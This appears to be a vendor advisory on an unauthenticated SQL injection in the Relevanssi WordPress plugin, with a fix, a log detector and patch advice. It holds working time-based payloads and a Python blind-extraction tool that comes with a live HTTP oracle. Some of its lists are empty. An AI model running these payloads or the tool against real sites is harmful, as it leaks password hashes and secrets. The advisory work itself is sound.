
[CVE-2025-4396] Unauthenticated SQL Injection in Relevanssi Gives Attackers a Direct Line to Your WordPress Database

Volerion Research

TL;DR
The Relevanssi – A Better Search plugin for WordPress fails to escape the cats and tags URL parameters before inserting them into a raw taxonomy query. Versions up to 4.24.4 (Free) and 2.27.4 (Premium) are affected. An unauthenticated attacker can append Boolean conditions or time delays to the query and extract data one bit at a time, not only from wp_posts and wp_terms but, through subqueries, from any table the WordPress database user can read. This is a textbook SQL injection that requires no authentication and no user interaction, so any public WordPress site running a vulnerable build is at risk until it upgrades.


1. Summary

CVE ID:               CVE-2025-4396
Affected Product(s):  Relevanssi – A Better Search ≤ 4.24.4 (Free) and ≤ 2.27.4 (Premium) when activated on WordPress
Volerion Risk Score:  7.1 / 10
Exploit Status:       No public PoC at publication time, but trivial to develop
CISA KEV:             No

Because search endpoints are usually open to anonymous visitors, the attack surface is every public page that accepts a search query. The immediate goal is normally data leakage (password hashes from wp_users, secrets and configuration from wp_options); with that data an attacker can work towards an administrator session and then create back-door users or edit content through the normal admin interface.


2. Context - Why a search plugin can bring down an entire site

Relevanssi replaces WordPress core search with a feature-rich engine that supports fuzzy matching, term weighting and taxonomy filters. To keep queries flexible, the plugin allows callers to specify category (cats) and tag (tags) filters through URL parameters. When those parameters feed directly into an SQL string, every WordPress site that enabled that feature inherits the vulnerability.

The plugin has more than 100 000 active installations according to the WordPress.org statistics page. That popularity means automated scanners will pick up the new target quickly, especially because the installed plugin version is readable from public metadata (such as the plugin's readme.txt) before any injection attempt is made.


3. Technical Details - Where the escape sequence went missing

The heart of the bug is in lib/search-tax-query.php, shown below at the last vulnerable release.

// vulnerable snippet around line 371
if ( ! empty( $_GET['cats'] ) ) {
    $cats = $_GET['cats'];               // raw, attacker-controlled string
    $sql  = "AND t.term_id IN ($cats)";  // interpolated with no cast or escaping
    $terms_where .= $sql;                // later spliced into the search query
}

The code concatenates the user-supplied cats value into $sql without calling intval(), esc_sql() or $wpdb->prepare(), so anything after the first numeric value is interpreted as SQL. A similar construct exists for tags in lib/search.php near line 1016.
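To make the failure mode concrete, here is an added example (not Relevanssi's code) that models the vulnerable concatenation in Python beside a hardened builder mirroring the intval()/$wpdb->prepare() style of fix. SQLite stands in for MySQL, so the demonstration uses a Boolean payload rather than SLEEP(); the function names are illustrative.

```python
# Added example (not Relevanssi's code): a Python model of the vulnerable
# string concatenation next to the intval()/$wpdb->prepare() style fix.
# Function names are illustrative; SQLite stands in for MySQL.
import re
import sqlite3


def build_where_vulnerable(cats: str) -> str:
    """Mirror of the vulnerable snippet: the raw parameter lands inside IN (...)."""
    return f"AND t.term_id IN ({cats})"


def php_intval(value: str) -> int:
    """Approximates PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def safe_term_ids(raw: str) -> list[int]:
    """Split on commas, cast every item to int, keep positive IDs only.
    A payload such as '1) AND (SELECT ...' collapses to [1]."""
    return [i for i in (php_intval(item) for item in raw.split(",")) if i > 0]


def build_where_hardened(cats: str) -> tuple[str, list[int]]:
    """Parametrised clause with one %d placeholder per ID plus the argument
    list, the shape $wpdb->prepare() takes. Empty input yields no clause."""
    ids = safe_term_ids(cats)
    if not ids:
        return "", []
    return "AND t.term_id IN (" + ", ".join(["%d"] * len(ids)) + ")", ids


def count_matching_terms(clause: str, args=()) -> int:
    """Runs the clause against a throwaway table of term_ids 1..5 so the two
    builders can be compared. SQLite uses '?' where $wpdb uses %d."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE t (term_id INTEGER)")
    con.executemany("INSERT INTO t VALUES (?)", [(i,) for i in range(1, 6)])
    sql = "SELECT COUNT(*) FROM t WHERE 1=1 " + clause.replace("%d", "?")
    return con.execute(sql, list(args)).fetchone()[0]


if __name__ == "__main__":
    payload = "1) OR (1=1)-- -"  # Boolean payload; SQLite has no SLEEP()
    print(count_matching_terms(build_where_vulnerable(payload)))  # 5: filter bypassed
    clause, args = build_where_hardened(payload)
    print(count_matching_terms(clause, args))  # 1: only term 1 matches
```

The hardened path is deliberately two steps: the integer cast makes the payload harmless on its own, and the placeholders mean the query never contains user-controlled text even if someone later relaxes the cast.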

An attacker can therefore issue the following request to test whether a site is vulnerable. The URL is shown unencoded for readability; in a real request the spaces and parentheses are percent-encoded:

https://example.com/?s=test&cats=1) AND (SELECT IF(1=1,SLEEP(5),0))-- -

The closing parenthesis of IN ($cats) is swallowed by the trailing comment, so the clause becomes AND t.term_id IN (1) AND (SELECT IF(1=1,SLEEP(5),0))-- -). If the response takes roughly five seconds longer than a normal search, the injection succeeded (measure a baseline first, and expect the observed delay to be a multiple of the SLEEP value if the database evaluates the subquery more than once). From there, Boolean or time-based payloads allow extraction of arbitrary columns, with the table prefix adjusted if the site does not use the default wp_:

/?s=test&cats=1) AND (SELECT CASE WHEN (SUBSTR((SELECT option_value FROM wp_options WHERE option_name='admin_email'),1,1)='a') THEN SLEEP(2) ELSE 0 END)-- -

WordPress normally connects to MySQL with an account that can read and write every table, so the leaked data is the whole database: password hashes in wp_users, secrets and keys in wp_options, and so on. Note that the injection lands inside a SELECT and $wpdb executes a single statement per query, so the attacker cannot append an UPDATE to change administrator passwords or edit stored posts directly; write access becomes relevant once leaked data or a cracked hash yields an administrator session.

Why the vulnerability bypasses common WAF rules

Many WordPress-specific WAF configurations whitelist the search path to reduce false positives. The detection payload above also contains no single quote: parentheses, numeric constants and built-in functions are enough, and the string comparisons needed for extraction can be written with ORD()/ASCII() against numbers or with hex literals such as 0x61 instead of 'a'. That slips past regular expressions that key on ' OR 1=1-style patterns.
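The extraction loop the payload above implies, and the quote-free construction this section describes, as one added example that is not part of the advisory: option_payload() builds a cats= value that compares ORD() of one character of an option against a number and names the option with a hex literal, and extract_option() binary-searches each character through a timing oracle. simulated_target() is a constructed stand-in for a vulnerable site with made-up data; http_timing_oracle() is the real-world equivalent and must only be pointed at sites you are authorised to test.

```python
# Added example, not part of the advisory: builds quote-free time-based
# payloads of the shape shown above and drives a blind extraction loop.
# simulated_target() is a constructed stand-in for a vulnerable site (its
# admin_email is made up); http_timing_oracle() is the real-world variant
# and is only for targets you are authorised to test.
import re
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable


def hex_literal(text: str) -> str:
    """MySQL hex literal (admin_email -> 0x61646d696e5f656d61696c), so the
    payload carries no quote characters at all."""
    return "0x" + text.encode().hex()


def option_payload(option_name: str, pos: int, threshold: int, delay: float) -> str:
    """cats= value asking: is ORD(char #pos of option_value) > threshold?
    True -> SLEEP(delay). ORD('') is 0 once pos runs past the end."""
    return (
        "1) AND (SELECT IF(ORD(SUBSTR((SELECT option_value FROM wp_options "
        f"WHERE option_name={hex_literal(option_name)}),{pos},1))>{threshold},"
        f"SLEEP({delay}),0))-- -"
    )


def extract_option(option_name: str, oracle: Callable[[str], float],
                   delay: float = 2.0, max_len: int = 64) -> str:
    """Binary-search each character's code (0..255) through the timing
    oracle: about 8 requests per character instead of one per candidate."""
    chars = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(option_payload(option_name, pos, mid, delay)) >= delay:
                lo = mid + 1  # ORD(...) > mid held: the code is above mid
            else:
                hi = mid
        if lo == 0:  # past the end of the string
            break
        chars.append(chr(lo))
    return "".join(chars)


def simulated_target(payload: str, delay: float = 2.0) -> float:
    """Constructed stand-in for the vulnerable site: parses the payload and
    returns the delay MySQL would add, without actually sleeping."""
    fake_options = {"admin_email": "admin@example.com"}  # made-up data
    m = re.search(r"option_name=0x([0-9a-f]+)\),(\d+),1\)\)>(\d+),SLEEP", payload)
    name = bytes.fromhex(m.group(1)).decode()
    pos, threshold = int(m.group(2)), int(m.group(3))
    value = fake_options.get(name, "")
    code = ord(value[pos - 1]) if pos <= len(value) else 0
    return delay if code > threshold else 0.0


def http_timing_oracle(site: str) -> Callable[[str], float]:
    """Real oracle: percent-encodes the payload into ?s=test&cats=... and
    returns the round-trip time. Subtract a measured baseline before use."""
    def oracle(payload: str) -> float:
        url = site.rstrip("/") + "/?" + urllib.parse.urlencode({"s": "test", "cats": payload})
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, timeout=30).read()
        except urllib.error.HTTPError:
            pass  # a 4xx/5xx response still carries the timing signal
        return time.monotonic() - start
    return oracle


if __name__ == "__main__":
    print(extract_option("admin_email", simulated_target))  # admin@example.com
```

Against a live target the threshold should be the SLEEP value plus the measured baseline, and a noisy result is best confirmed by repeating the request; the simulated oracle returns exact timings, which a real server never does.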


4. Impact - From data leakage to full site compromise

SQL injection on WordPress rarely stops at reading the database. With write access an attacker can:

While the plugin bug itself does not allow remote code execution, database access is often enough to reach RCE through the built-in theme editor or a rogue plugin once an administrator session is acquired.


5. Remediation - What defenders should do now

Upgrade Relevanssi to the newest version available in the WordPress plugin repository or the premium vendor portal. The maintainer has replaced string concatenation with $wpdb->prepare() and added intval() casts for numeric parameters. If an immediate upgrade is not possible:

The live database, and any backup taken before remediation that you intend to restore, should be checked for signs of tampering: new administrator accounts, unexpected changes to the wp_options table, and modified posts or theme files.
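Where an upgrade has to wait, the access log is the quickest place to see whether the parameters are being probed. The following is an added example (not from the advisory or the plugin) over constructed Combined Log Format lines: it percent-decodes the query string and flags any cats or tags value that is not a plain comma-separated list of integers, which is the only shape a term-ID filter legitimately takes.

```python
# Added example (not from the advisory or the plugin): a detection pass over
# web-server access logs that flags cats/tags values which are not a plain
# comma-separated list of integers. The log lines below are constructed samples.
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
NUMERIC_LIST = re.compile(r"^\d+(,\d+)*$")  # the only legitimate shape
WATCHED = ("cats", "tags")

# Constructed sample log: one benign cats filter, one probe (the advisory's
# SLEEP payload, percent-encoded as a browser or tool would send it), one
# benign tags filter with an encoded comma, and one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [13/May/2025:10:01:02 +0000] "GET /?s=shoes&cats=3,7 HTTP/1.1" 200 5120
203.0.113.9 - - [13/May/2025:10:01:09 +0000] "GET /?s=test&cats=1)%20AND%20(SELECT%20IF(1%3D1,SLEEP(5),0))--%20- HTTP/1.1" 200 4811
198.51.100.2 - - [13/May/2025:10:02:11 +0000] "GET /?s=test&tags=5%2C6 HTTP/1.1" 200 4903
198.51.100.2 - - [13/May/2025:10:02:14 +0000] "POST /wp-login.php HTTP/1.1" 302 0
"""


def suspicious_requests(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, parameter, decoded_value) for every request whose
    cats or tags value contains anything other than digits and commas."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes, so 5%2C6 is judged as "5,6" and drops
        # blank values, which the plugin's empty() check ignores anyway.
        for name, values in parse_qs(query).items():
            if name.lower().rstrip("[]") not in WATCHED:
                continue
            for value in values:
                if not NUMERIC_LIST.match(value.strip()):
                    hits.append((m["ip"], name, value))
    return hits


if __name__ == "__main__":
    for ip, param, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\t{param}\t{value}")
```

The same rule can be expressed as a WAF or reverse-proxy condition while the patch is pending: reject the request when cats or tags, after percent-decoding, contains anything but digits and commas. Matching on the decoded value matters, since the encoded form of a probe contains no obvious SQL keyword boundaries.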


6. Timeline

Date (UTC)   Milestone
2025-05-13   CVE-2025-4396 published
2025-05-13   Volerion completes enrichment and publishes risk score

7. References


About Volerion

Volerion delivers AI-driven enrichment minutes after a CVE goes live. A single call to our REST API returns CVSS 4.0 vectors, exploitability metrics and affected products complete with remediation. Additionally, we offer different scoring profiles, complete with insight into the eight comprehensive categories that make up the final score. Our API is also available in the traditional NVD API 2.0 format, so integration is as simple as swapping hosts. Spend less time parsing CVEs and more time closing them.

How the Volerion Risk Score Fits With CVSS, EPSS and KEV

At the time of writing:

The Volerion Risk Score brings these signals together and layers them with additional factors such as affected product prevalence, exploit maturity and remediation effort. For CVE-2025-4396 the score is 7.1, placing it in our high-risk band and highlighting that defenders should patch quickly even though the CVSS and EPSS signals are not at their maximum.

